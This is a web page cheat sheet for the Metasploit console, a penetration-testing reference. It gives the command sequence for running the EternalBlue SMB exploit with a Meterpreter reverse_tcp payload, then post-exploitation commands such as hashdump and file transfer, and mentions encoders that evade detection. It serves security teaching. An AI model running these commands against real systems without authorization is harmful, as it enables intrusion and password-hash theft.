Metasploit Cheat Sheet
Covers the Metasploit Framework console workflow including module search, exploit configuration, payload selection, and session handling.
2 PagesIntermediateFeb 15, 2026
msfconsole Basics
Launching and navigating the Metasploit console.
bash
msfconsole # Launch the consolesearch type:exploit eternalblue # Search for a moduleuse exploit/windows/smb/ms17_010_eternalblue # Select a moduleinfo # Show details of selected moduleshow options # List required/optional parametersshow payloads # List compatible payloads
Configuring and Running an Exploit
Setting options and launching an exploit against a target.
bash
set RHOSTS 192.168.1.50set RPORT 445set PAYLOAD windows/x64/meterpreter/reverse_tcpset LHOST 192.168.1.10set LPORT 4444check # Verify target is likely vulnerableexploit # Or: run
Session & Meterpreter Commands
Managing active sessions after successful exploitation.
- sessions -l- List active sessions
- sessions -i <id>- Interact with a specific session
- background- Send current Meterpreter session to background (Ctrl+Z also works)
- sysinfo- Show target system information (Meterpreter)
- getuid- Show current user context (Meterpreter)
- hashdump- Dump password hashes from SAM database (requires privileges)
- upload / download- Transfer files to/from the target (Meterpreter)
Module Types
The major categories of modules in the framework.
- Exploit- Code that takes advantage of a specific vulnerability
- Payload- Code executed on the target after successful exploitation
- Auxiliary- Scanning, fuzzing, and other non-exploit modules
- Post- Post-exploitation actions run on an active session
- Encoder- Obfuscates payloads to evade signature-based detection
Pro Tip
Run 'db_nmap' instead of a plain nmap scan when the PostgreSQL database is connected — results are stored automatically and can be queried with 'hosts' and 'services', feeding directly into module targeting.
Was this cheat sheet helpful?
Explore Topics
#Metasploit#MetasploitCheatSheet#Cybersecurity#Intermediate#MsfconsoleBasics#ConfiguringAndRunningAnExploit#SessionMeterpreterCommands#ModuleTypes#CheatSheet#SkillVeris
Advertisement
Sri Hayavadhana Info-Tech
Professional Web Designing Services
- Responsive Websites
- E-commerce Solutions
- SEO Friendly Design
- Fast & Secure
- Support & Maintenance